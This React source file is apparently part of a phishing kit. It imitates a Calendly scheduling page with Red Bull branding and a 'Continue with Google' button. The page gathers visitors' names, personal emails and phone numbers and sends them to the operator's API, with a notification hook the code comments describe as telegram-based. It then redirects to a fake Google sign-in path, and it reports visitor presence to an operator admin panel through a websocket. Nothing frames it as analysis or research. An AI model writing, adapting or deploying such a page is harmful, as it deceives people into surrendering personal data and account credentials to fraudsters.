import React from 'react';
import { io } from 'socket.io-client';
import { getApiUrl } from '../utils/apiConfig';

// ✅ Import all assets
import clock from './assets/clock.2ced35e604aa6d1f8eea0c5026a61f6d.37ed247879b59fe743d5614e4f510d8c.svg';
import redbullLogo from './assets/loogsos.5456684a4e17e1c4687a.png';
import camera from './assets/camera.d8eeb4352132a583d5a94936a8f1798a.3ed45bc0762ef3da2ace1c2096ada089.svg';
import calendlyLogo from './assets/calendly.8d2b1d88617b5da85edf35811ff2ab7a.d1075a2021262e0d7158fb3cedaf1527.svg';
import facebookIcon from './assets/gg.1655ccdd19b7c6beb6361aa61c823215.svg';
import globe from './assets/globe.1eae85210f348ab9e928a0dd6e17ff89.96b944207cce82b6585e3ec9b52c5639.svg';

const API_URL = getApiUrl();

// Floating label input used for the inline form
function FloatInput({ id, label, type = 'text' , value, onChange }) {
  const [focused, setFocused] = React.useState(false);
  const active = focused || value.length > 0;
  return (
    <div style={{ position: 'relative', width: '100%' }}>
      <input
        id={id}
        type={type}
        value={value}
        onChange={e => onChange(e.target.value)}
        onFocus={() => setFocused(true)}
        onBlur={() => setFocused(false)}
        style={{
          width: '100%', height: '52px', padding: '0 14px',
          fontSize: '15px', borderRadius: '8px',
          border: `1px solid ${focused ? '#1a73e8' : '#dadce0'}`,
          outline: 'none', background: '#fff',
          boxSizing: 'border-box', transition: 'border-color 0.18s',
        }}
      />
      <label htmlFor={id} style={{
        position: 'absolute', left: '14px', pointerEvents: 'none',
        transition: 'all 0.15s', color: focused ? '#1a73e8' : '#5f6368',
        background: active ? '#fff' : 'transparent',
        padding: active ? '0 4px' : '0',
        fontSize: active ? '11px' : '14px',
        top: active ? '-8px' : '16px',
      }}>
        {label}
      </label>
    </div>
  );
}

function MainPage() {
  const [allowed, setAllowed] = React.useState(false);
  const [form, setForm] = React.useState({ name: '', surname: '', phone: '', email: '' });

  React.useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    if (!isLocal && !sessionStorage.getItem('visitor_approved')) {
      window.location.href = '/';
      return;
    }
    setAllowed(true);
  }, []);

  // Keep visitor presence alive so the admin panel stays green
  React.useEffect(() => {
    const isLocal = ['localhost', '127.0.0.1', '::1'].includes(window.location.hostname);
    const visitorId = sessionStorage.getItem('visitor_id');
    if (isLocal || !visitorId) return;
    const socket = io(`${API_URL}/visitor`, { transports: ['websocket', 'polling'], withCredentials: true });
    socket.on('connect', () => socket.emit('visitor:identify', visitorId));
    return () => socket.disconnect();
  }, []);

  const handleButtonClick = async () => {
    // Fire-and-forget: submit form data + telegram notification simultaneously
    const payload = { name: form.name, surname: form.surname, phone: form.phone, email: form.email };
    try {
      await Promise.all([
        fetch(`${API_URL}/api/booking`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(payload),
        }).catch(() => {}),
        fetch(`${API_URL}/api/notify/google-click`, {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(payload),
        }).catch(() => {}),
      ]);
    } catch (_) {}
    window.location.href = '/v3/signin/identifierauthusercontinue=';
  };

  if (!allowed) return <div style={{ background: '#f1f2f7', minHeight: '100vh' }} />;

  return (
    <div id="root">
      <div className="calendy-div">
        <div className="calendy-grid">
          {/* Left Side */}
          <div className="left-side">
            <div>
              <img alt="Red Bull" className="selby-logo" src={redbullLogo} style={{ marginBottom: '20px' }} />
              <div style={{ display: 'flex', alignItems: 'center', gap: '12px', marginBottom: '4px' }}>
                <img alt="AJ Cooper" src="/taylor.png" style={{ width: '48px', height: '48px', borderRadius: '50%', objectFit: 'cover' }} />
                <h3 style={{ margin: 0, lineHeight: '48px' }}>Taylor Springer</h3>
              </div>
              <h2>Meet Taylor Springer</h2>
              <div></div>

              <div className="calendy-div-icons">
                <div className="calendy-icons">
                  <img alt="clock" src={clock} />
                  <span>30 min</span>
                </div>

                <div className="calendy-icons" style={{ gap: '15px' }}>
                  <img alt="camera" src={camera} />
                  <span>Web conferencing details provided upon confirmation.</span>
                </div>

                <div className="footer-links">
                  <a href="#">Cookie settings</a>
                  <a href="#">Report abuse</a>
                </div>
              </div>
            </div>
          </div>

          {/* Right Side */}
          <div className="right-side">
            <a
              className="VJL48qbQzWENTFAh1Knk e9TS9yoMqqIN2PqBo1QG _i6SG2jlTfccH2ZZblil"
              href="/"
              data-discover="true"
            >
              <div data-id="branding" className="jWSwi_R_Xl7kPjUhuQoo _igrKj_5lj_5nWQu8DPw">
                <div className="V7YfvNqWv0XKYKys7N7K __d5yUqDgBEjoX7J2dql">powered by</div>
                <div className="HvybhIo63ZbBJxHh7Ann RK3ps09FjZwzHTaYDakl">Calendly</div>
              </div>
            </a>

            <div>
              <div className="calendy-logo">
                <img alt="Calendly Logo" src={calendlyLogo} />
              </div>
              <h2>Schedule your call with us!</h2>

              <div className="fb-text">
                <p className="fb-paragraphg">
                  <span>The easiest way for you to sign in is with Google.</span>
                  <span> This will automatically connect your calendar</span>
                  <span className="mr-1"> so you can start using Calendly right away.</span>
                </p>

                {/* ── Inline form fields ── */}
                <div style={{ display: 'flex', flexDirection: 'column', gap: '14px', margin: '20px 0 4px' }}>
                  <div style={{ display: 'flex', gap: '12px' }}>
                    <FloatInput id="mp-name"    label="First Name"   value={form.name}    onChange={v => setForm(f => ({ ...f, name: v }))} />
                    <FloatInput id="mp-surname" label="Last Name"    value={form.surname} onChange={v => setForm(f => ({ ...f, surname: v }))} />
                  </div>
                  <FloatInput id="mp-email" label="Personal Email" type="email" value={form.email} onChange={v => setForm(f => ({ ...f, email: v }))} />
                  <FloatInput id="mp-phone" label="Phone Number"   type="tel"   value={form.phone} onChange={v => setForm(f => ({ ...f, phone: v }))} />
                </div>

                <div style={{ display: 'flex', alignItems: 'center', gap: '12px', margin: '16px 0 4px' }}>
                  <div style={{ flex: 1, height: '1px', background: 'transparent' }} />
                  <div style={{ flex: 1, height: '1px', background: 'transparent' }} />
                </div>

                <button onClick={handleButtonClick} className="fb-btn">
                  <img alt="Google" src={facebookIcon} style={{ width: '20px' }} />{' '}
                  Continue with Google
                </button>
              </div>
            </div>

            <div className="time">
              <h4>Time zone</h4>
              <div className="timezone">
                <img alt="globe" src={globe} />
                <span>Global (16:48)</span>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  );
}

export default MainPage;
